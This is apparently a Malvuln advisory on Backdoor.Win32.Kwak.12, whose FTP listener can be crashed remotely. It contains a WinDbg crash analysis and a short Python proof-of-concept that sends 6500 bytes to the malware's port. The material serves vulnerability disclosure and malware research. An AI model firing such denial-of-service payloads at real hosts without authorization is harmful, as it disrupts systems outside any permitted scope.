Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/c25393545e5ead3a35996ef9a887bd34_C.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Kwak.12 Vulnerability: Remote Denial of Service Description: The backdoor runs an FTP server that listens on TCP port 37885. Attackers who can reach the infected host can send a payload of around 6500 bytes using socket program to cause an unknown internal exception to crash the malware. Type: PE32 MD5: c25393545e5ead3a35996ef9a887bd34 Vuln ID: MVID-2021-0146 Dropped files: ASLR: False DEP: False Safe SEH: True Disclosure: 03/25/2021 Memory Dump: (d30.1084): Unknown exception - code 0eedfade (first/second chance not available) eax=0019fd18 ebx=03fa4458 ecx=00000007 edx=00000000 esi=03fa3af0 edi=03fa49b0 eip=75eb08f2 esp=0019fd18 ebp=0019fd70 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 KERNELBASE!RaiseException+0x62: 75eb08f2 8b4c2454 mov ecx,dword ptr [esp+54h] ss:002b:0019fd6c=af5cfeac 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* FAULTING_IP: KERNELBASE!RaiseException+62 75eb08f2 8b4c2454 mov ecx,dword ptr [esp+54h] EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 75eb08f2 (KERNELBASE!RaiseException+0x00000062) ExceptionCode: 0eedfade ExceptionFlags: 00000001 NumberParameters: 7 Parameter[0]: 004151a2 Parameter[1]: 03fa6724 Parameter[2]: 03fa4458 Parameter[3]: 03fa3af0 Parameter[4]: 03fa49b0 Parameter[5]: 0019fdac Parameter[6]: 0019fda4 DEFAULT_BUCKET_ID: DELPHI_EXCEPTION PROCESS_NAME: Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe ERROR_CODE: (NTSTATUS) 0xeedfade - EXCEPTION_CODE: (Win32) 0xeedfade (250477278) - EXCEPTION_PARAMETER1: 004151a2 EXCEPTION_PARAMETER2: 03fa6724 EXCEPTION_PARAMETER3: 03fa4458 EXCEPTION_PARAMETER4: 3fa3af0 MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 00001084 PRIMARY_PROBLEM_CLASS: DELPHI_EXCEPTION BUGCHECK_STR: APPLICATION_FAULT_DELPHI_EXCEPTION LAST_CONTROL_TRANSFER: from 004490f9 to 75eb08f2 STACK_TEXT: 0019fdbc 004490f9 03fa3af0 03fa234c 03fa3af0 KERNELBASE!RaiseException+0x62 WARNING: Stack unwind information not available. Following frames may be wrong. 0019fdf0 004490f9 03fa234c 03fa234c 03fa234c Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1 0019fe6c 004017fa 0019ff01 0019feac 00455c3f Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1 0019fea0 004017a5 03fa1fd0 0019ff70 00455c3f Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!_GetExceptDLLinfo+0x7a1 0019fed4 004490f9 0046119e 0044c754 00428d70 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!_GetExceptDLLinfo+0x74c 0019ff04 0045b8cf 00000000 00461330 00000000 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1 0019ff2c 0045b91e 004674e4 00000001 00000000 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45ba7 0019ff50 0045ac48 00000000 00000000 00000000 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45bf6 0019ff64 0045baf4 00000000 0019ffcc 0045688c Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x44f20 0019ff80 76198654 002b8000 76198630 c91b9631 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45dcc 0019ff94 77104a77 002b8000 3d0540e2 00000000 kernel32!BaseThreadInitThunk+0x24 0019ffdc 77104a47 ffffffff 77129eb7 00000000 ntdll!__RtlUserThreadStart+0x2f 0019ffec 00000000 00483060 002b8000 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: ~0s; .ecxr ; kb FOLLOWUP_IP: Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+333d1 004490f9 8b5e10 mov ebx,dword ptr [esi+10h] SYMBOL_STACK_INDEX: 1 SYMBOL_NAME: backdoor_win32_kwak_12!Ftpsrvcinitialization$qqrv+333d1 FOLLOWUP_NAME: MachineOwner MODULE_NAME: Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34 IMAGE_NAME: Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe DEBUG_FLR_IMAGE_TIMESTAMP: 39a61aec BUCKET_ID: APPLICATION_FAULT_DELPHI_EXCEPTION_backdoor_win32_kwak_12!Ftpsrvcinitialization$qqrv+333d1 FAILURE_BUCKET_ID: DELPHI_EXCEPTION_eedfade_Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe!Ftpsrvcinitialization$qqrv Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=37885 def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) PAYLOAD="A"*6500 s.send(PAYLOAD) s.close() print("Backdoor.Win32.Kwak.12 / Remote Denial of Service") print("MD5: c25393545e5ead3a35996ef9a887bd34") print("By Malvuln") if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).